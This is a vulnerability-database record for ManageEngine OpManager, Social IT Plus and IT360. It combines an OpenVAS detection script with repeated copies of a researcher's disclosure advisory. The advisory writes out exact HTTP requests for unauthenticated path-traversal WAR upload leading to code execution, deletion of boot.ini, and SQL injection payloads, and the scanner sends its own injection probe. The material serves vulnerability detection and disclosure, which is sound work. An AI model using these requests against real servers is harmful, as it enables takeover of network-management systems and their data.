{"id": "OPENVAS:1361412562310805103", "type": "openvas", "bulletinFamily": "scanner", "title": "ManageEngine OpManager Multiple Vulnerabilities Nov14", "description": "This host is installed with ManageEngine\n OpManager and is prone to multiple vulnerabilities.", "published": "2014-11-24T00:00:00", "modified": "2020-04-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805103", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["http://www.exploit-db.com/exploits/35209", "https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability", "https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix"], "cvelist": ["CVE-2014-6035", "CVE-2014-7866", "CVE-2014-7868"], "lastseen": "2020-04-16T16:53:27", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1905", "CPAI-2015-0559", "CPAI-2015-0963"]}, {"type": "cve", "idList": ["CVE-2014-6035", "CVE-2014-7866", "CVE-2014-7868"]}, {"type": "dsquare", "idList": ["E-404", "E-406", "E-407"]}, {"type": "exploitdb", "idList": ["EDB-ID:43896"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C6C0E52E4741BC06145EA77E364C27BF"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "MANAGEENGINE_OPMANAGER_OPM_BVNAME_SQLI.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128474", "PACKETSTORM:129037"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31197", "SECURITYVULNS:DOC:31461", "SECURITYVULNS:VULN:14008", "SECURITYVULNS:VULN:14113"]}, {"type": "seebug", "idList": ["SSV:87404"]}, {"type": "zdi", "idList": ["ZDI-15-139", "ZDI-15-140", "ZDI-15-141", "ZDI-15-142", "ZDI-15-144", "ZDI-15-145"]}, {"type": "zdt", "idList": ["1337DAY-ID-22843", "1337DAY-ID-29642"]}]}, "score": {"value": 0.1, "vector": "NONE"}, 
"backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2015-0963"]}, {"type": "cve", "idList": ["CVE-2014-6035", "CVE-2014-7866", "CVE-2014-7868"]}, {"type": "dsquare", "idList": ["E-407"]}, {"type": "exploitdb", "idList": ["EDB-ID:43896"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_OPM_BVNAME_SQLI.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129037"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31197"]}, {"type": "seebug", "idList": ["SSV:87404"]}, {"type": "zdi", "idList": ["ZDI-15-142"]}, {"type": "zdt", "idList": ["1337DAY-ID-29642"]}]}, "exploitation": null, "vulnersScore": 0.1}, "pluginID": "1361412562310805103", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ManageEngine OpManager Multiple Vulnerabilities Nov14\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_opmanager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805103\");\n script_version(\"2020-04-15T08:52:55+0000\");\n script_cve_id(\"CVE-2014-7866\", \"CVE-2014-7868\", \"CVE-2014-6035\");\n script_bugtraq_id(71001, 71002);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 08:52:55 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-24 16:16:10 +0530 (Mon, 24 Nov 2014)\");\n script_name(\"ManageEngine OpManager Multiple Vulnerabilities Nov14\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ManageEngine\n OpManager and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to execute sql query or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - /servlet/MigrateLEEData script not properly sanitizing user input, specifically path traversal style attacks\n (e.g. '../') supplied via the 'fileName' parameter.\n\n - /servlet/MigrateCentralData script not properly sanitizing user input, specifically path traversal style attacks\n (e.g. 
'../') supplied via the 'zipFileName' parameter.\n\n - /servlet/APMBVHandler script not properly sanitizing user-supplied input to the 'OPM_BVNAME' POST parameter.\n\n - /servlet/DataComparisonServlet script not properly sanitizing user-supplied input to the 'query' POST\n parameter.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to upload arbitrary files and\n execute the script within the file with the privileges of the web server, manipulate SQL queries in the backend\n database, and disclose certain sensitive information.\");\n\n script_tag(name:\"affected\", value:\"ManageEngine OpManager version 11.3/11.4\");\n\n script_tag(name:\"solution\", value:\"Apply the patches from the referenced links\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35209\");\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\");\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_opmanager_consolidation.nasl\");\n script_mandatory_keys(\"manageengine/opmanager/http/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!get_app_location(port: port, cpe: CPE))\n exit(0);\n\ndata = \"OPERATION_TYPE=Delete&OPM_BVNAME=aaa'; SELECT PG_SLEEP(1)--\";\nurl = \"/servlet/APMBVHandler\";\n\nreq = http_post_put_req(port: port, url: url, data: data,\n add_headers: 
make_array(\"Content-Type\", \"application/x-www-form-urlencoded\"));\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (\"Action=BV_DELETED\" >< res && \"SELECT PG_SLEEP(1)--\" >< res && \"Result=Success\" >< res &&\n \"Result=Failure\" >!< res) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659976447, "score": 1659977168}, "_internal": {"score_hash": "d3c2d7132f3e19daaa95afe3debcbbdf"}}
{"zdt": [{"lastseen": "2018-03-14T14:37:35", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29642", "href": "https://0day.today/exploit/description/29642", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. 
With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n \r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n \r\nAffected versions: OpManager v? to v11.4\r\n \r\n \r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n \r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n \r\n \r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... 
WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. 
No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n \r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/29642", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-28T01:37:12", "description": "ManageEngine OpManager, Social IT Plus, and IT360 suffer from code execution, remote shell upload, and remote SQL injection vulnerabilities.", "cvss3": {}, "published": "2014-11-10T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Plus / IT360 Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-10T00:00:00", "id": "1337DAY-ID-22843", "href": "https://0day.today/exploit/description/22843", "sourceData": "This time we have a file upload leading to remote code execution and a\r\nblind SQL injection in ManageEngine OpManager, Social IT Plus and\r\nIT360.\r\nManageEngine have released an emergency fix, see details in the\r\nadvisory below. The proper fixed version will be 11.5, which will come\r\nout at the end of the year.\r\n\r\nI had already released a Metasploit exploit for RCE back in September\r\n[2], which also had an emergency fix and will only be properly fixed\r\nin 11.5, so there is no point in updating the exploit. 
This is just\r\nanother vector that ManageEngine have plugged while we wait for the\r\nrelease of 11.5. Note that this is all for OpManager. No indication\r\nwas given of when Social IT or IT360 will be updated with the security\r\nfixes. However the emergency patches can be applied to all applications.\r\n\r\nAnyway details are below, and I have updated the full text advisory in [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last\r\nupdated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. 
With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration.\"\r\n\r\n\r\n>> Technical details:\r\n\r\n(#1 and #2 were previously released in September, see [2])\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload (unauthenticated\r\non OpManager and Social IT)\r\nCVE-2014-7866\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection (unauthenticated)\r\nCVE-2014-7868\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi]\r\n --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [B] and [C].\r\nThis patch can 
be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360\r\n10.4).\r\nThe fix will be included in OpManager version 11.5 which should be\r\nreleased sometime in late November or December 2014. No indication was\r\ngiven for when fixed versions of IT360 and Social IT Plus will be\r\nreleased.\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\n\n# 0day.today [2018-02-27] #", "sourceHref": "https://0day.today/exploit/22843", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2014-11-09T00:00:00", "title": "ManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2014-11-09T00:00:00", "id": "EXPLOITPACK:C6C0E52E4741BC06145EA77E364C27BF", "href": "", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information 
Security\n==========================================================================\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\n\n>> Background on the affected products:\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\n\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\n\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\n\n\n>> Technical details:\n#1\nVulnerability: Remote code execution via WAR file upload\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nCVE-2014-6034\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\n<... WAR file payload ...>\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\nA Metasploit module that exploits this vulnerability has been released.\n\nb)\nCVE-2014-6035\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\n<... 
WAR file payload ...>\n\nAffected versions: OpManager v? to v11.4\n\n\n#2\nVulnerability: Arbitrary file deletion\nCVE-2014-6036\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\n\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\n\n\n#3\nVulnerability: Remote code execution via file upload\nCVE-2014-7866\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\nb)\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\n\n#4\nVulnerability: Blind SQL injection\nCVE-2014-7868\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\nb)\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\n\n>> Fix:\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 
11.0, IT360 10.4).\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\nResolves #1 and #2\n\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\nResolves #3\n\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\nResolves #4\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:10:14", "description": "No description provided by source.", "published": "2014-11-13T00:00:00", "type": "seebug", "title": "ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87404", "id": "SSV:87404", "sourceData": "\n >> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last\r\nupdated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. 
Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration.\"\r\n \r\n \r\n>> Technical details:\r\n \r\n(#1 and #2 were previously released in September, see [2])\r\n \r\n#3\r\nVulnerability: Remote code execution via file upload (unauthenticated\r\non OpManager and Social IT)\r\nCVE-2014-7866\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... 
WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection (unauthenticated)\r\nCVE-2014-7868\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi]\r\n --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [B] and [C].\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360\r\n10.4).\r\nThe fix will be included in OpManager version 11.5 which should be\r\nreleased sometime in late November or December 2014. 
No indication was\r\ngiven for when fixed versions of IT360 and Social IT Plus will be\r\nreleased.\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n \r\n \r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\nhttp://seclists.org/fulldisclosure/2014/Nov/12\r\nhttp://seclists.org/fulldisclosure/2014/Nov/18\r\n \r\n[2]\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\n \r\n[3]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87404", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-7866", "CVE-2014-7868"], "description": "\r\n\r\nHi,\r\n\r\nThis is the 8th part of the ManageOwnage series. For previous parts see [1].\r\n\r\nThis time we have a file upload leading to remote code execution and a\r\nblind SQL injection in ManageEngine OpManager, Social IT Plus and\r\nIT360.\r\nManageEngine have released an emergency fix, see details in the\r\nadvisory below. The proper fixed version will be 11.5, which will come\r\nout at the end of the year.\r\n\r\nI had already released a Metasploit exploit for RCE back in September\r\n[2], which also had an emergency fix and will only be properly fixed\r\nin 11.5, so there is no point in updating the exploit. This is just\r\nanother vector that ManageEngine have plugged while we wait for the\r\nrelease of 11.5. 
